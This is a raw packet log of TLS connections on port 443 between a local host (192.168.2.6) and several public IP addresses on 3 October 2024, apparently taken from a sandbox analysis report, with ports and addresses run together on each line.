                                                                                                                                                                                                                                                Oct 3, 2024 16:09:24.776618004 CEST44349723104.18.94.41192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:24.776652098 CEST49723443192.168.2.6104.18.94.41
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:24.777010918 CEST44349723104.18.94.41192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:24.777070045 CEST49723443192.168.2.6104.18.94.41
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:24.777080059 CEST44349723104.18.94.41192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:24.777143002 CEST44349723104.18.94.41192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:24.777194977 CEST49723443192.168.2.6104.18.94.41
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:24.777200937 CEST44349723104.18.94.41192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:24.777426958 CEST44349723104.18.94.41192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:24.777478933 CEST49723443192.168.2.6104.18.94.41
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:24.777487040 CEST44349723104.18.94.41192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:24.829792976 CEST49723443192.168.2.6104.18.94.41
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:24.829801083 CEST44349723104.18.94.41192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:24.863744020 CEST44349723104.18.94.41192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:24.863820076 CEST49723443192.168.2.6104.18.94.41
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:24.863831043 CEST44349723104.18.94.41192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:24.863959074 CEST44349723104.18.94.41192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:24.863991976 CEST44349723104.18.94.41192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:24.863998890 CEST49723443192.168.2.6104.18.94.41
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:24.864013910 CEST44349723104.18.94.41192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:24.864110947 CEST49723443192.168.2.6104.18.94.41
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:24.864119053 CEST44349723104.18.94.41192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:24.864836931 CEST44349723104.18.94.41192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:24.864908934 CEST49723443192.168.2.6104.18.94.41
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:24.864916086 CEST44349723104.18.94.41192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:24.864953041 CEST44349723104.18.94.41192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:24.864993095 CEST49723443192.168.2.6104.18.94.41
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:24.865000963 CEST44349723104.18.94.41192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:24.865231037 CEST44349723104.18.94.41192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:24.865262032 CEST44349723104.18.94.41192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:24.865282059 CEST49723443192.168.2.6104.18.94.41
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:24.865291119 CEST44349723104.18.94.41192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:24.865361929 CEST49723443192.168.2.6104.18.94.41
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:24.865856886 CEST44349723104.18.94.41192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:24.866203070 CEST44349723104.18.94.41192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:24.866236925 CEST44349723104.18.94.41192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:24.866257906 CEST49723443192.168.2.6104.18.94.41
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:24.866265059 CEST44349723104.18.94.41192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:24.866393089 CEST49723443192.168.2.6104.18.94.41
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:24.866400957 CEST44349723104.18.94.41192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:24.866838932 CEST44349723104.18.94.41192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:24.866868973 CEST44349723104.18.94.41192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:24.866883039 CEST49723443192.168.2.6104.18.94.41
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:24.866890907 CEST44349723104.18.94.41192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:24.866930008 CEST49723443192.168.2.6104.18.94.41
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:24.867120028 CEST44349723104.18.94.41192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:24.867785931 CEST44349723104.18.94.41192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:24.867868900 CEST49723443192.168.2.6104.18.94.41
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:24.867875099 CEST44349723104.18.94.41192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:24.867918015 CEST49723443192.168.2.6104.18.94.41
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:24.868957996 CEST49723443192.168.2.6104.18.94.41
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:24.868967056 CEST44349723104.18.94.41192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:24.886024952 CEST49732443192.168.2.6104.18.95.41
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:24.886065006 CEST44349732104.18.95.41192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:24.886135101 CEST49732443192.168.2.6104.18.95.41
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:24.889542103 CEST49732443192.168.2.6104.18.95.41
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:24.889570951 CEST44349732104.18.95.41192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:25.108939886 CEST44349727172.67.188.178192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:25.109663010 CEST49727443192.168.2.6172.67.188.178
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:25.109684944 CEST44349727172.67.188.178192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:25.110537052 CEST44349727172.67.188.178192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:25.110598087 CEST49727443192.168.2.6172.67.188.178
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:25.110934973 CEST49727443192.168.2.6172.67.188.178
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:25.110981941 CEST44349727172.67.188.178192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:25.111089945 CEST49727443192.168.2.6172.67.188.178
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:25.111097097 CEST44349727172.67.188.178192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:25.111115932 CEST49727443192.168.2.6172.67.188.178
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:25.111154079 CEST44349727172.67.188.178192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:25.152177095 CEST49727443192.168.2.6172.67.188.178
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:25.171567917 CEST44349729104.21.76.57192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:25.171926975 CEST49729443192.168.2.6104.21.76.57
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:25.171964884 CEST44349729104.21.76.57192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:25.175503969 CEST44349729104.21.76.57192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:25.175575018 CEST49729443192.168.2.6104.21.76.57
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:25.175926924 CEST49729443192.168.2.6104.21.76.57
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:25.176099062 CEST44349729104.21.76.57192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:25.176296949 CEST49729443192.168.2.6104.21.76.57
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:25.176307917 CEST44349729104.21.76.57192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:25.207547903 CEST44349730172.67.188.178192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:25.207742929 CEST49730443192.168.2.6172.67.188.178
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:25.207766056 CEST44349730172.67.188.178192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:25.208811045 CEST44349730172.67.188.178192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:25.208868980 CEST49730443192.168.2.6172.67.188.178
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:25.209295988 CEST49730443192.168.2.6172.67.188.178
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:25.209357977 CEST44349730172.67.188.178192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:25.209451914 CEST49730443192.168.2.6172.67.188.178
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:25.209460974 CEST44349730172.67.188.178192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:25.215728045 CEST49729443192.168.2.6104.21.76.57
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:25.237400055 CEST44349727172.67.188.178192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:25.237440109 CEST44349727172.67.188.178192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:25.237471104 CEST44349727172.67.188.178192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:25.237495899 CEST44349727172.67.188.178192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:25.237505913 CEST49727443192.168.2.6172.67.188.178
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:25.237528086 CEST44349727172.67.188.178192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:25.237541914 CEST49727443192.168.2.6172.67.188.178
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:25.237768888 CEST44349727172.67.188.178192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:25.237795115 CEST44349727172.67.188.178192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:25.237807989 CEST49727443192.168.2.6172.67.188.178
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:25.237814903 CEST44349727172.67.188.178192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:25.237853050 CEST49727443192.168.2.6172.67.188.178
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:25.237859964 CEST44349727172.67.188.178192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:25.238217115 CEST44349727172.67.188.178192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:25.238241911 CEST44349727172.67.188.178192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:25.238264084 CEST49727443192.168.2.6172.67.188.178
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:25.238271952 CEST44349727172.67.188.178192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:25.238338947 CEST49727443192.168.2.6172.67.188.178
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:25.242300987 CEST44349727172.67.188.178192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:25.264027119 CEST49730443192.168.2.6172.67.188.178
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:25.288587093 CEST49727443192.168.2.6172.67.188.178
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:25.303849936 CEST44349728142.250.186.164192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:25.307105064 CEST44349729104.21.76.57192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:25.307214022 CEST44349729104.21.76.57192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:25.307288885 CEST44349729104.21.76.57192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:25.307343960 CEST49729443192.168.2.6104.21.76.57
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:25.307358027 CEST44349729104.21.76.57192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:25.307445049 CEST44349729104.21.76.57192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:25.307511091 CEST49729443192.168.2.6104.21.76.57
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:25.307518005 CEST44349729104.21.76.57192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:25.307543993 CEST44349729104.21.76.57192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:25.307563066 CEST49729443192.168.2.6104.21.76.57
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:25.307718992 CEST44349729104.21.76.57192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:25.307768106 CEST49729443192.168.2.6104.21.76.57
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:25.307775974 CEST44349729104.21.76.57192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:25.311331987 CEST49728443192.168.2.6142.250.186.164
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:25.311347008 CEST44349728142.250.186.164192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:25.311705112 CEST44349729104.21.76.57192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:25.311779976 CEST44349729104.21.76.57192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:25.311780930 CEST49729443192.168.2.6104.21.76.57
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:25.311800957 CEST44349729104.21.76.57192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:25.311851978 CEST49729443192.168.2.6104.21.76.57
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:25.311868906 CEST44349729104.21.76.57192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:25.312494040 CEST44349728142.250.186.164192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:25.312542915 CEST49728443192.168.2.6142.250.186.164
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:25.313949108 CEST49728443192.168.2.6142.250.186.164
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:25.314012051 CEST44349728142.250.186.164192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:25.323153973 CEST44349727172.67.188.178192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:25.323229074 CEST44349727172.67.188.178192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:25.323488951 CEST49727443192.168.2.6172.67.188.178
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:25.327222109 CEST49727443192.168.2.6172.67.188.178
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:25.327236891 CEST44349727172.67.188.178192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:25.352958918 CEST44349732104.18.95.41192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:25.357100010 CEST49729443192.168.2.6104.21.76.57
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:25.357136011 CEST49728443192.168.2.6142.250.186.164
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:25.357151031 CEST44349728142.250.186.164192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:25.364160061 CEST49732443192.168.2.6104.18.95.41
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:25.364186049 CEST44349732104.18.95.41192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:25.365678072 CEST44349732104.18.95.41192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:25.365741968 CEST49732443192.168.2.6104.18.95.41
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:25.374458075 CEST44349730172.67.188.178192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:25.374496937 CEST44349730172.67.188.178192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:25.374531984 CEST44349730172.67.188.178192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:25.374578953 CEST44349730172.67.188.178192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:25.374582052 CEST49730443192.168.2.6172.67.188.178
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:25.374629021 CEST49730443192.168.2.6172.67.188.178
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:25.384160042 CEST49732443192.168.2.6104.18.95.41
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:25.384268999 CEST44349732104.18.95.41192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:25.385392904 CEST49732443192.168.2.6104.18.95.41
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:25.385404110 CEST44349732104.18.95.41192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:25.395566940 CEST44349729104.21.76.57192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:25.395716906 CEST44349729104.21.76.57192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:25.395766020 CEST49729443192.168.2.6104.21.76.57
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:25.395775080 CEST44349729104.21.76.57192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:25.395838022 CEST44349729104.21.76.57192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:25.395879984 CEST49729443192.168.2.6104.21.76.57
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:25.395888090 CEST44349729104.21.76.57192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:25.396012068 CEST44349729104.21.76.57192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:25.396055937 CEST49729443192.168.2.6104.21.76.57
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:25.396063089 CEST44349729104.21.76.57192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:25.396313906 CEST44349729104.21.76.57192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:25.396363974 CEST49729443192.168.2.6104.21.76.57
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:25.396370888 CEST44349729104.21.76.57192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:25.396437883 CEST44349729104.21.76.57192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:25.396486044 CEST49729443192.168.2.6104.21.76.57
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:25.396492958 CEST44349729104.21.76.57192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:25.396930933 CEST44349729104.21.76.57192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:25.396975040 CEST49729443192.168.2.6104.21.76.57
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:25.396981955 CEST44349729104.21.76.57192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:25.397185087 CEST44349729104.21.76.57192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:25.397228003 CEST49729443192.168.2.6104.21.76.57
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:25.397236109 CEST44349729104.21.76.57192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:25.397391081 CEST44349729104.21.76.57192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:25.397434950 CEST49729443192.168.2.6104.21.76.57
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:25.397442102 CEST44349729104.21.76.57192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:25.397535086 CEST44349729104.21.76.57192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:25.397579908 CEST49729443192.168.2.6104.21.76.57
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:25.397587061 CEST44349729104.21.76.57192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:25.397989035 CEST44349729104.21.76.57192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:25.398053885 CEST44349729104.21.76.57192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:25.398056984 CEST49729443192.168.2.6104.21.76.57
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:25.398077965 CEST44349729104.21.76.57192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:25.398116112 CEST49729443192.168.2.6104.21.76.57
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:25.398220062 CEST44349729104.21.76.57192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:25.403146029 CEST49728443192.168.2.6142.250.186.164
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:25.415082932 CEST49730443192.168.2.6172.67.188.178
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:25.415096045 CEST44349730172.67.188.178192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:25.428363085 CEST49732443192.168.2.6104.18.95.41
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:25.429328918 CEST49733443192.168.2.6104.18.95.41
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:25.429348946 CEST44349733104.18.95.41192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:25.429497004 CEST49733443192.168.2.6104.18.95.41
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:25.430263042 CEST49733443192.168.2.6104.18.95.41
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:25.430275917 CEST44349733104.18.95.41192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:25.433629990 CEST44349731184.28.90.27192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:25.433720112 CEST49731443192.168.2.6184.28.90.27
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:25.439405918 CEST49731443192.168.2.6184.28.90.27
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:25.439436913 CEST44349731184.28.90.27192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:25.439907074 CEST44349731184.28.90.27192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:25.451205969 CEST49729443192.168.2.6104.21.76.57
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:25.451215982 CEST44349729104.21.76.57192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:25.483846903 CEST44349729104.21.76.57192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:25.483905077 CEST49729443192.168.2.6104.21.76.57
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:25.483915091 CEST44349729104.21.76.57192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:25.483989000 CEST44349729104.21.76.57192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:25.484042883 CEST49729443192.168.2.6104.21.76.57
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:25.484050035 CEST44349729104.21.76.57192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:25.484273911 CEST49731443192.168.2.6184.28.90.27
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:25.484355927 CEST44349729104.21.76.57192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:25.484378099 CEST44349729104.21.76.57192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:25.484395027 CEST49729443192.168.2.6104.21.76.57
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:25.484404087 CEST44349729104.21.76.57192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:25.484422922 CEST49729443192.168.2.6104.21.76.57
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:25.484776974 CEST44349729104.21.76.57192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:25.484827042 CEST49729443192.168.2.6104.21.76.57
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:25.484833956 CEST44349729104.21.76.57192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:25.484954119 CEST44349729104.21.76.57192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:25.484972000 CEST44349729104.21.76.57192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:25.484998941 CEST49729443192.168.2.6104.21.76.57
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:25.485007048 CEST44349729104.21.76.57192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:25.485584974 CEST44349729104.21.76.57192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:25.485641003 CEST49729443192.168.2.6104.21.76.57
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:25.485650063 CEST44349729104.21.76.57192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:25.485667944 CEST44349729104.21.76.57192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:25.485714912 CEST49729443192.168.2.6104.21.76.57
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:25.485723019 CEST44349729104.21.76.57192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:25.486248970 CEST49729443192.168.2.6104.21.76.57
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:25.486262083 CEST44349729104.21.76.57192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:25.486287117 CEST44349729104.21.76.57192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:25.486310959 CEST49729443192.168.2.6104.21.76.57
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:25.486458063 CEST44349729104.21.76.57192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:25.486504078 CEST49729443192.168.2.6104.21.76.57
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:25.486511946 CEST44349729104.21.76.57192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:25.486558914 CEST49729443192.168.2.6104.21.76.57
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:25.486943960 CEST44349729104.21.76.57192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:25.486999035 CEST49729443192.168.2.6104.21.76.57
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:25.487148046 CEST44349729104.21.76.57192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:25.487196922 CEST49729443192.168.2.6104.21.76.57
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:25.487461090 CEST44349729104.21.76.57192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:25.487508059 CEST49729443192.168.2.6104.21.76.57
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:25.487533092 CEST44349729104.21.76.57192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:25.487577915 CEST49729443192.168.2.6104.21.76.57
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:25.488171101 CEST44349729104.21.76.57192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:25.488220930 CEST49729443192.168.2.6104.21.76.57
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:25.488368988 CEST44349729104.21.76.57192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:25.488415956 CEST49729443192.168.2.6104.21.76.57
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:25.495542049 CEST44349732104.18.95.41192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:25.495666981 CEST44349732104.18.95.41192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:25.495704889 CEST49732443192.168.2.6104.18.95.41
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:25.495712996 CEST44349732104.18.95.41192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:25.495805025 CEST44349732104.18.95.41192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:25.495852947 CEST49732443192.168.2.6104.18.95.41
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:25.495858908 CEST44349732104.18.95.41192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:25.495951891 CEST44349732104.18.95.41192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:25.495992899 CEST49732443192.168.2.6104.18.95.41
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:25.495999098 CEST44349732104.18.95.41192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:25.496087074 CEST44349732104.18.95.41192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:25.496227980 CEST49732443192.168.2.6104.18.95.41
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:25.496232986 CEST44349732104.18.95.41192.168.2.6
                                                                                                                                                                                                                                                Oct 3, 2024 16:09:25.500029087 CEST44349732104.18.95.41192.168.2.6
